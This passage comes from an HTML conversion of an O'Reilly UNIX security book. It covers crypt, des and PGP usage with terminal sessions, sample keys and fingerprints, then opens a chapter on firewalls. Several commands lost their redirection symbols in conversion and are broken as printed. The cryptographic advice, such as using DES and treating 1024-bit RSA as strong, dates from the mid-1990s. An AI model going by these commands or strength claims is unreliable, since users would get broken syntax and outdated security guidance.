attackers know you have done this, they can modify their version of CBW accordingly.<br />

If you use compress or pack to compress your file, remove the 3-byte header. Files compressed with compress contain a<br />

3-byte signature, or header, consisting of the hexadecimal values 1f, 9d and 90 (in that order). If your attacker believes<br />

that your file was compressed before it was encrypted, knowing how the first three bytes decrypt can help him to decrypt<br />

the rest of the file. You can strip these three bytes with the dd command:[26]<br />

[26] Using dd this way is very slow and inefficient. If you are going to be encrypting a lot of compressed<br />

files, you may wish to write a small program to remove the headers more efficiently.<br />

% compress -c encrypted<br />

Of course, you must remember to replace the 3-byte header before you attempt to uncompress the file:<br />

% (compress -cf /dev/null;crypt plaintext<br />

If you do not have compress, use tar to bundle your file to be encrypted with other files containing random data; then encrypt the<br />

tar file. The presence of random data will make it more difficult for decryption programs such as CBW to isolate your plaintext.<br />

As encrypted files contain binary information, you must process them with uuencode if you wish to email them.<br />

6.6.1.3 Example<br />

To compress, encrypt, unencode, and send a file with electronic mail:<br />

% ls -l myfile<br />

-rw-r--r-- 1 fred 166328 Nov 16 15:25 myfile<br />

% compress myfile<br />

% ls -l myfile.Z<br />

-rw-r--r-- 1 fred 78535 Nov 16 15:25 myfile.Z<br />

% dd if=myfile.Z of=myfile.Z.strip bs=3 skip=1<br />

26177+1 records in<br />

26177+1 records out<br />

% crypt akey < myfile.Z.strip | uuencode afile | mail spook@nsa.gov<br />

To decrypt a file that you have received and saved in the file text file:<br />

% head -3 file<br />

begin 0600 afile<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (2 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

M?Z/#V3V,IGO!](D!175:;S9_IU\A7K;:'LBB,8363R,T+/WZSOC4PQ,U/6Q<br />

MX,T8&XZDQ1+[4Y[*N4W@A3@9YM*4XV+U\)X9NT.7@Z+W"WY^9-?(JRU,-4%<br />

% uudecode file<br />

% ls -l afile<br />

-rw-r--r-- 1 fred 78532 Nov 16 15:32 afile<br />

% (compress -cf /dev/null;crypt < afile) | uncompress -c > myfile<br />

myfile now contains the original file.<br />

6.6.2 des: The Data Encryption Standard<br />

There are several software implementations of the Data Encryption Standard that are commonly available for <strong>UNIX</strong> computers.<br />

Several of the most popular implementations are based on the des code written by Phil Karn, a <strong>UNIX</strong> guru (and ham radio<br />

operator whose call sign is KA9Q). In the past, some <strong>UNIX</strong> vendors have included des commands as part of their operating<br />

system, although many of these implementations have been removed so that the companies can maintain a single version of their<br />

operating system for both export and domestic use.[27] Nevertheless, des software is widely available both inside and outside the<br />

United States.<br />

[27] For example, Sun Microsystems ships the easily broken crypt encryption program with Solaris, and sells a "US<br />

Encryption Kit" which contains the des program at a nominal cost.<br />

The des command is a filter that reads from standard input and writes to standard output. It usually accepts the following<br />

command-line options:<br />

% des -e|-d [-h] [-k key] [-b]<br />

When using the DES, encryption and decryption are not identical operations, but are inverses of each other. The option -e<br />

specifies that you are encrypting a file. For example:<br />

% des -e message.des<br />

Enter key: mykey<br />

Enter key again: mykey<br />

% cat message.des<br />

"UI}mE8NZlOi\Iy|<br />

(The Enter key: prompt is from the program; the key is not echoed.)<br />

Use the -d option to decrypt your file:<br />

% des -d < message.des<br />

Enter key: mykey<br />

Enter key again: mykey<br />

This is the secret message.<br />

You can use the -k option to specify the key on the command line. On most versions of <strong>UNIX</strong>, any user of the system can use the<br />

ps command to see what commands other users are running. Karn's version of des tries to mitigate the danger of the ps command<br />

by making a copy of its command line arguments and erasing the original. Nevertheless, this is a potential vulnerability, and<br />

should be used with caution.<br />

NOTE: You should never specify a key in a shell script: anybody who has access to read the script will be able to<br />

decode your files.<br />

A -b option to the command selects Electronic Code Book (ECB) mode. The default is Cipher Block Chaining (CBC). As<br />

described in "DES modes" earlier in this chapter, ECB mode encodes a block at a time, with identical input blocks encoding to<br />

identical output blocks. This encoding will reveal if there is a pattern to the input. However, it will also be able to decrypt most<br />

of the file even if parts of it are corrupted or deleted. CBC mode hides repeated patterns, and results in a file that cannot be<br />

decrypted after any point of change or deletion.<br />

If you use the -h option, des will allow you to specify a key in hexadecimal. Such keys should be randomly generated. If you do<br />

not specify a key in hexadecimal, then your key will most likely be restricted to characters that you can type on your keyboard.<br />

Many people further restrict their keys to words or phrases that they can remember (see the sidebar entitled "Number of<br />

Passwords" in Chapter 3, Users and Passwords). Unfortunately, this method makes it dramatically easier for an attacker to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (3 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

decrypt a DES-encrypted file by doing a key search. To see why, consider the following table:<br />

Table 6.3: Key Search Comparisons<br />

Key Choice Algorithm Keyspace Number of Possible Keys<br />

Random DES key 128 8 = 2 56 7.2 x 10 16<br />

Typeable characters[28] 127 8 6.8 x 10 16<br />

Printable characters 96 8 7.2 x 10 15<br />

Two words 1,000,000 2 10 12<br />

One word 1,000,000 10 6<br />

[28] You can't enter null as a character in your key.<br />

Some versions of des will encrypt a file if it is specified on the command line. Input and output filenames are optional. If only<br />

one filename is given, it is assumed to be the input file.<br />

Some versions of <strong>UNIX</strong> designed for export include a des command that doesn't do anything. Instead of encrypting your file, it<br />

simply prints an error message explaining that the software version of des is not available.<br />

6.6.3 PGP: Pretty Good Privacy<br />

In 1991, Phil Zimmermann wrote a program called PGP which performs both private key and public key cryptography. That<br />

program was subsequently released on the <strong>Internet</strong> and improved by numerous programmers, mostly outside of the United<br />

States.[29] In 1994, Zimmermann turned the distribution of PGP over to the Massachusetts Institute of Technology, which<br />

makes the software available for anonymous FTP from the computer net-dist.mit.edu.<br />

[29] Get the whole story! Although this section presents a good introduction to PGP, the program is far too<br />

complicated to describe here. For a full description of PGP, we recommend the book PGP: Pretty Good Privacy by<br />

Simson Garfinkel (<strong>O'Reilly</strong> & Associates, 1995).<br />

The version of PGP that is distributed from MIT uses the RSA Data <strong>Sec</strong>urity software package RSAREF. This software is only<br />

available for noncommercial use. If you wish to use PGP for commercial purposes, you should purchase it from ViaCrypt<br />

International (whose address is listed in Appendix D).<br />

PGP Version 2 uses IDEA as its private key encryption algorithm and RSA for its public key encryption. (Later versions of PGP<br />

may allow a multiplicity of encryption algorithms to be used, such as Triple DES.) PGP can also seal and verify digital<br />

signatures, and includes sophisticated key-management software. It also has provisions for storing public and private keys in<br />

special files called key rings (illustrated in Figure 6.5). Finally, PGP has provisions for certifying keys, again using digital<br />

signatures.<br />

Figure 6.5: PGP key rings<br />

6.6.3.1 Encrypting files with IDEA<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (4 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

You can use PGP to encrypt a file with the IDEA encryption cipher with the following command line:<br />

% pgp -c message<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:32 GMT<br />

You need a pass phrase to encrypt the file.<br />

Enter pass phrase:some days green tomatoes<br />

Enter same pass phrase again: some days green tomatoes<br />

Just a moment....<br />

Ciphertext file: message.pgp<br />

%<br />

Rather than using your pass phrase as the cryptographic key, PGP instead calculates the MD5 hash function and uses the hash.<br />

This means that you can use a pass phrase of any length. Because IDEA uses a 128-bit key, key-search attacks are not feasible.<br />

PGP automatically compresses everything that it encrypts, which is fortunate, because after a file is encrypted, it cannot be<br />

compressed further: the output will appear random, and file compression requires some repeated patterns to compress.<br />

If you want to decrypt your file, run PGP with the encrypted file as its sole argument:<br />

% pgp message.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:47 GMT<br />

File is conventionally encrypted.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: some days green tomatoes<br />

Just a moment....Pass phrase appears good. .<br />

Plaintext filename: message<br />

%<br />

If you do not type the correct pass phrase, PGP will not decrypt your file:<br />

% pgp message.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 03:48 GMT<br />

File is conventionally encrypted.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: I am the walrus<br />

Just a moment...<br />

Error: Bad pass phrase.<br />

You need a pass phrase to decrypt this file.<br />

Enter pass phrase: Love will find a way<br />

Just a moment...<br />

Error: Bad pass phrase.<br />

For a usage summary, type: pgp -h<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (5 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

For more detailed help, consult the PGP User's Guide.<br />

%<br />

6.6.3.2 Creating your PGP public key<br />

The real power of PGP is not the encryption of files, but the encryption of electronic mail messages. PGP uses public key<br />

cryptography, which allows anybody to create a message and encrypt it using your public key. After the message is encrypted,<br />

no one can decrypt it unless someone has your secret key. (Ideally, nobody other than you should have a copy of your key.) PGP<br />

also allows you to electronically "sign" a document with a digital signature, which other people can verify.<br />

To make use of these features, you will first need to create a public key for yourself and distribute it among your correspondents.<br />

Do this with PGP's -kg option:<br />

% pgp -kg<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:01 GMT<br />

Pick your RSA key size:<br />

1) 512 bits- Low commercial grade, fast but less secure<br />

2) 768 bits- High commercial grade, medium speed, good security<br />

3) 1024 bits- "Military" grade, slow, highest security<br />

Choose 1, 2, or 3, or enter desired number of bits: 3<br />

Generating an RSA key with a 1024-bit modulus.<br />

You need a user ID for your public key. The desired form for this<br />

user ID is your name, followed by your E-mail address enclosed in<br />

, if you have an E-mail address.<br />

For example: John Q. Smith <br />

Enter a user ID for your public key:<br />

Michelle Love <br />

You need a pass phrase to protect your RSA secret key.<br />

Your pass phrase can be any sentence or phrase and may have many<br />

words, spaces, punctuation, or any other printable characters.<br />

Enter pass phrase:every thought burns into substance<br />

Enter same pass phrase again:every thought burns into substance<br />

Note that key generation is a lengthy process.<br />

We need to generate 720 random bits. This is done by measuring the<br />

time intervals between your keystrokes. Please enter some random text<br />

on your keyboard until you hear the beep:<br />

Here you type a lot of random data that nobody else really sees. It doesn't really<br />

matter what you type, just don't hold down the key. 0 * -Enough, thank you.<br />

..........................++++ ..........++++<br />

Key generation completed.<br />

%<br />

The passphrase is used to encrypt the secret key that is stored on your computer. In this manner, if somebody breaks into your<br />

account or steals your computer, they won't be able to read your encrypted messages.<br />

After you've generated your key, you should do two things with it immediately:<br />

1.<br />

Sign it yourself. You should always sign your own key right away. Do this as:<br />

% pgp -ks love@michelle.org<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (6 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

2.<br />

There are some obscure ways that your key might be abused if it is circulated without a signature in place, so be sure that<br />

you sign it yourself.<br />

Generate a revocation certificate and store it offline somewhere. Don't send it to anyone! The idea behind generating the<br />

revocation right now is that you still remember the passphrase and have the secret key available. If something should<br />

happen to your stored key, or you forget the passphrase, the public/private key pair becomes useless. Having the<br />

revocation certificate ready in advance allows you to send it out if that should ever happen. You generate the certificate<br />

by:<br />

% pgp -kx Michelle revoke.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Uses the RSAREF(tm) Toolkit, which is copyright RSA Data <strong>Sec</strong>urity, Inc.<br />

Distributed by the Massachusetts Institute of Technology.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:06 GMT<br />

Extracting from key ring: `/Users/simsong/Library/pgp/pubring.pgp',<br />

userid "Michelle".<br />

Key for user ID: Michelle Love <br />

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key extracted to file `revoke.pgp'.<br />

% pgp -kd Michelle revoke.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Uses the RSAREF(tm) Toolkit, which is copyright RSA Data <strong>Sec</strong>urity, Inc.<br />

Distributed by the Massachusetts Institute of Technology.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:07 GMT<br />

Key for user ID: Michelle Love <br />

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Do you want to permanently revoke your public key<br />

by issuing a secret key compromise certificate<br />

for "Michelle" (y/N)? y<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "Michelle"<br />

Enter pass phrase: every thought burns into substance<br />

Pass phrase is good. Just a moment....<br />

Key compromise certificate created.<br />

Warning: `revoke.pgp' is not a public keyring<br />

Now, save the revoke.pgp file in a safe place, off line. For example, you might put it on a clearly labeled floppy disk, then place<br />

the disk inside a clearly labeled envelope. Write your signature across the envelope's flap. Then store the envelope in your<br />

safe-deposit box.<br />

To extract a printable, ASCII version of your key, use PGP's -kxaf (Key extract ASCII filter) command:<br />

% pgp -kxaf Michelle<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (7 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

Current time: 1995/02/12 04:11 GMT<br />

Extracting from key ring: '/Users/simsong/Library/pgp/pubring.pgp', userid "Mic.<br />

Key for user ID: Michelle Love <br />

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key extracted to file 'pgptemp.$00'.<br />

-----BEGIN PGP PUBLIC KEY BLOCK-----<br />

Version: 2.6.1<br />

mQCNAy89iJMAAAEEALrXJQpVmkTCtjp5FrkCvceFZydiEq2xGgoBvDUOn92XtJiH<br />

PVvope9VA4Lw2wDAbZDD5oucpGg8I1E4luvHVsvF0mpk2JzzWE1hVxWv4rpYIM+x<br />

qSbCryUU5iSneFGPBI5D3nue4wC3XbvQmvYYp5LR6r2eyHU3ktazHzgKllUFAAUR<br />

tCFNaWNoZWxsZSBMb3ZlIDxsb3ZlQG1pY2hlbGxlLm9yZz4=<br />

=UPJB<br />

-----END PGP PUBLIC KEY BLOCK-----<br />

%<br />

You can redirect the output of this command to a file, or simply use your window system's cut-and-paste feature to copy the key<br />

into an email message.<br />

If you get somebody else's PGP key, you can add it to your keyring with the PGP -ka (key add) option. Simply save the key in a<br />

file, then type:<br />

% pgp -ka michelle.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:15 GMT<br />

Looking for new keys...<br />

pub 1024/0A965505 1995/02/12 Michelle Love <br />

Checking signatures...<br />

Keyfile contains:<br />

1 new key(s)<br />

One or more of the new keys are not fully certified.<br />

Do you want to certify any of these keys yourself (y/N)? y<br />

Key for user ID: Michelle Love <br />

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key fingerprint = 0E 8A 9C C4 CE 44 96 60 83 79 CB F1 F3 02 0C 7E<br />

This key/userID association is not certified.<br />

Do you want to certify this key yourself (y/N)? n<br />

%<br />

6.6.3.3 Encrypting a message<br />

After you have somebody's public key, you can encrypt a message using the PGP's -eat command. This will encrypt the message,<br />

save it in ASCII (so you can send it with electronic mail), and properly preserve end-of-line characteristics (assuming that this is<br />

a text message). You can sign the message with your own digital signature by specifying -seat instead of -eat. If you want to use<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (8 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

PGP as a filter, add the letter "f" to your command. This process is shown graphically in Figure 6.6.<br />

Figure 6.6: Encrypting email with PGP<br />

For example, you can take the file message, sign it with your digital signature, encrypt it with Michelle's public key, and send it<br />

to her, by using the command:<br />

% cat message | pgp -seatf message Michelle | mail -s message<br />

:w<br />

love@michelle.org<br />

6.6.3.4 Adding a digital signature to an announcement<br />

With PGP, you can add a digital signature to a message so that people who receive the message can verify that it is from you<br />

(provided that they have your public key).<br />

For example, if you wanted to send out a PGP-signed message designed to warm the hearts but dull the minds of your students,<br />

you might do it like this:<br />

% pgp -sat classes<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:30 GMT<br />

A secret key is required to make a signature.<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "simson"<br />

Enter pass phrase: all dogs go to heavenPass phrase is good.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (9 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

Key for user ID: Simson L. Garfinkel <br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Just a moment....<br />

Clear signature file: classes.asc<br />

%<br />

The signed message itself looks like this:<br />

% cat classes.asc<br />

-----BEGIN PGP SIGNED MESSAGE-----<br />

Classes are cancelled for the following two months. Everybody enrolled<br />

in the course will get an A.<br />

- -Your Professor<br />

-----BEGIN PGP SIGNATURE-----<br />

Version: 2.6.1<br />

iQCVAwUBLz2Ow3D7CbCQPJJlAQH7CAP/V5COuOPGTDhSeGl6XkxKiVAPD9JDfeNd<br />

5mFr8K/N7W9tyj7THiS/eI92e5/cRI/5z6KzxbSNIx8gGe4h9/bjO5a6rUfa3C+K<br />

j0zCIwETQzSE3tVWXxQv7it4HBZY+xJL8C1CinEckZZc09PvGwyYbPe4tSF8GHHl<br />

0zyTTtueqLg=<br />

=3ihy<br />

-----END PGP SIGNATURE-----<br />

%<br />

6.6.3.5 Decrypting messages and verifying signatures<br />

To decrypt a message or verify a signature on a message, simply save the message into a file. Then run PGP, specifying the<br />

filename as your sole argument. If you are decrypting a message, you will need to type your pass phrase. For example, to decrypt<br />

a message that has been sent you, use the following command:<br />

% cat message.asc<br />

-----BEGIN PGP MESSAGE-----<br />

Version: 2.6.1<br />

hIwDcPsJsJA8kmUBBACN/HinvYo1GRL+p6pT14OV3L50q/v1aqGsHHSOa37t89O1<br />

23/jm6lzTuh83Qy5KbMpLkMbRg/5FqTD56GX9MoyP4IuLzKxtuA87n9j/pYv4ES3<br />

I0aCUMOvU8SqNTM1qC+ZV7j6NeseCUiRrMFVVlr5uZ2TH8kkDiQBd0x1/h7LNaYA<br />

AACFsT5sa/rd1uh/1A7yDSqZZNGzlCn0aC55o8lgSoPKOgvT0JGZFFOS5h+v3wxw<br />

/U752OaQaSIIj0rVK8UT0thSxyM8xoMIRmBJgmwoloKI+/THy5/Toy8FIqS5taHu<br />

o0wkuhDwcjNg4PJ3dZkoLwnGWwwM3y5vKqrMFHQfNnO6xJ9qBqnKLg==<br />

=EEko<br />

-----END PGP MESSAGE-----<br />

%<br />

Process the file with PGP:<br />

% pgp message.asc<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:54 GMT<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (10 of 13) [2002-04-12 10:45:08]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

File is encrypted. <strong>Sec</strong>ret key is required to read it.<br />

Key for user ID: simson<br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Also known as: Simson L. Garfinkel <br />

You need a pass phrase to unlock your RSA secret key.<br />

Enter pass phrase: subcommander marcos<br />

Pass phrase is good. Just a moment......<br />

Plaintext filename: message<br />

% cat message<br />

Hi Simson!<br />

Things are all set. We are planning the military takeover for next<br />

Tuesday. Bring your lasers.<br />

-Carlos<br />

%<br />

You can also specify the "f" option, which causes PGP to simply send the decrypted file to stdout.<br />

6.6.3.6 PGP detached signatures<br />

PGP has the ability to store digital signatures in a separate file from the original document. Such a signature is called a detached<br />

signature. Detached signatures are recommended for binary files, such as programs, because the signature will not change the<br />

data.<br />

For the <strong>UNIX</strong> system administrator, one of the truly valuable things that you can do with PGP is to create detached signatures of<br />

your critical system files. These signatures will be signed by you, the system administrator. You (or other users on your system)<br />

can then use these signatures to detect unauthorized modification in the critical system files: if the files that you sign are ever<br />

modified, the signature will no longer validate.<br />

For example, to create a detached signature for the /bin/login program, you could use PGP's -sb flags:<br />

# pgp -sb /bin/login -u simsong<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/09/12 15:28 GMT<br />

A secret key is required to make a signature.<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "simsong@pleasant.cambridge.ma.us"<br />

Enter pass phrase: nobody knows my name<br />

Pass phrase is good.<br />

Key for user ID: Simson L. Garfinkel <br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Just a moment....<br />

Signature file: /bin/login.sig<br />

#<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (11 of 13) [2002-04-12 10:45:08]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

In this example, the superuser ran PGP so that the signature for /bin/login could be recorded in /bin/login.sig (the default<br />

location). You could specify a different location to save the signature by using PGP's -o filename option.<br />

To verify the signature, simply run PGP, supplying the signature and the original file as command line arguments:<br />

% pgp /bin/login.sig /bin/login<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/09/12 15:32 GMT<br />

File has signature. Public key is required to check signature.<br />

File '/bin/login.sig' has signature, but with no text.<br />

Text is assumed to be in file '/bin/login'.<br />

.<br />

Good signature from user "Simson L. Garfinkel ".<br />

Signature made 1995/09/12 15:28 GMT<br />

Signature and text are separate. No output file produced.<br />

%<br />

Using digital signatures to validate the integrity of your system's executables is a better technique than using simple<br />

cryptographic checksum schemes, such as MD5. Digital signatures are better because with a simple MD5 scheme, you risk an<br />

attacker's modifying both the binary file and the file containing the MD5 checksums. With digital signatures, you don't have to<br />

worry about an attacker's recreating the signature, because the attacker does not have access to the secret key. (However, you<br />

still need to worry about someone altering the source code of your checksum program to make a copy of your secret key when<br />

you type it.)<br />

NOTE: Protect your key! No matter how secure your encryption system is, you should take the same precautions<br />

with your encryption key that you take with your password: there is no sense in going to the time and expense of<br />

encrypting all of your data with strong ciphers such as DES or RSA if you keep your encryption keys in a file in<br />

your home directory, or write them on a piece of paper attached to your terminal.<br />

Finally, never use any of your passwords as an encryption key! If an attacker learns your password, your encryption<br />

key will be the only protection for your data. Likewise, if the encryption program is weak or compromised, you do<br />

not want your attacker to learn your password by decrypting your files. The only way to prevent this scenario is by<br />

using different words for your password and encryption keys.<br />

Our PGP Keys<br />

One way to verify someone's key is by getting it from him or her in person. If you get the key directly from the person involved,<br />

you can have some confidence that the key is really his. Alternatively, you can get the key from a public keyserver, WWW page,<br />

or other location. Then, you verify the key fingerprint. This is normally generated as pgp - kvc keyid. You can do this over the<br />

telephone, or in person. You can also do it by finding the key fingerprint in a trusted location ... such as printed in a book.<br />

Here are the key ids and fingerprints for our keys. The keys themselves may be obtained from the public key servers. If you don't<br />

know how to access the key servers, read the PGP documentation, or Simson's PGP book, also from <strong>O'Reilly</strong>.<br />

pub 1024/FC0C02D5 1994/05/16 Eugene H. Spafford <br />

Key fingerprint = 9F 30 B7 C5 8B 52 35 8A 42 4B 73 EE 55 EE C5 41<br />

pub 1024/903C9265 1994/07/15 Simson L. Garfinkel <br />

Key fingerprint = 68 06 7B 9A 8C E6 58 3D 6E D8 0E 90 01 C5 DE 01<br />

6.5 Message Digests and<br />

Digital Signatures<br />

6.7 Encryption and U.S. Law<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (12 of 13) [2002-04-12 10:45:08]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (13 of 13) [2002-04-12 10:45:08]


[Chapter 21] Firewalls<br />

21. Firewalls<br />

Contents:<br />

What's a Firewall?<br />

Building Your Own Firewall<br />

Example: Cisco Systems Routers as Chokes<br />

Setting Up the Gate<br />

Special Considerations<br />

Final Comments<br />

Chapter 21<br />

Most systems for providing <strong>UNIX</strong> network security that we have discussed in this book are designed to<br />

protect an individual <strong>UNIX</strong> host from a hostile network. We have also explored systems such as<br />

Kerberos and <strong>Sec</strong>ure RPC, which allow a set of hosts to communicate securely in a hostile environment.<br />

As an alternative to protecting individual computers on a network, many organizations have opted for a<br />

seemingly simpler solution: protecting an organization's internal network from external attack.<br />

The simplest way to protect a network of computers is with physical isolation. Avoid the problems of<br />

networks by not connecting your host to the <strong>Internet</strong> and not providing dial-in modems. Nobody from the<br />

outside will be able to attack your computers without first entering your physical premises. Although this<br />

approach completely ignores the damage that insiders can do, it is nevertheless a simple, straightforward<br />

policy that has been used by most organizations for years. In many environments, this is still the best way<br />

to approach network security - there is little to be gained from connection to outside networks, and much<br />

to lose.<br />

Recently, however, the growth of the <strong>Internet</strong> has made physical isolation more difficult. Employees in<br />

organizations want email, they want access to Usenet news, and they want to browse the World Wide<br />

Web. In addition, organizations want to publish information about themselves on the Web. To allow<br />

partial connection to the <strong>Internet</strong>, while retaining some amount of isolation, some organizations are using<br />

firewalls to protect their security.<br />

Firewalls are powerful tools, but they should never be used instead of other security measures. They<br />

should only be used in addition to such measures.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_01.htm (1 of 11) [2002-04-12 10:45:09]


[Chapter 21] Firewalls<br />

21.1 What's a Firewall?<br />

A firewall gives organizations a way to create a middle ground between networks that are completely<br />

isolated from external networks, such as the <strong>Internet</strong>, and those that are completely connected. Placed<br />

between an organization's internal network and the external network, the firewall provides a simple way<br />

to control the amount and kinds of traffic that will pass between the two.<br />

The term firewall comes from the construction industry. When apartment houses or office buildings are<br />

built, they are often equipped with firewalls - specially constructed walls that are resistant to fire. If a fire<br />

should start in the building, it may burn out of control in one portion, but the firewall will stop or slow<br />

the progress of the fire until help arrives.<br />

The same philosophy can be applied to the protection of local area networks of machines from outside<br />

attack. Used within an organization, a firewall can limit the amount of damage: an intruder may break<br />

into one set of machines, but the firewall will protect others. Erected between an organizational network<br />

and the <strong>Internet</strong> at large, a firewall prevents a malicious attacker who has gained control of computers<br />

outside the organization's walls from gaining a foothold on the inside. Firewalls seem to make sense<br />

because there is always a "fire" burning somewhere on the <strong>Internet</strong>.<br />

21.1.1 Default Permit vs. Default Deny<br />

The fundamental function of a firewall is to restrict the flow of information between two networks. To<br />

set up your firewall, you must therefore define what kinds of data pass and what kinds are blocked. This<br />

is called defining your firewall's policy. After a policy is defined, you must then create the actual<br />

mechanisms that implement that policy.<br />

There are two basic strategies for defining firewall policy:<br />

Default permit<br />

With this strategy, you give the firewall the set of conditions that will result in data being blocked.<br />

Any host or protocol that is not covered by your policy will be passed by default.<br />

Default deny<br />
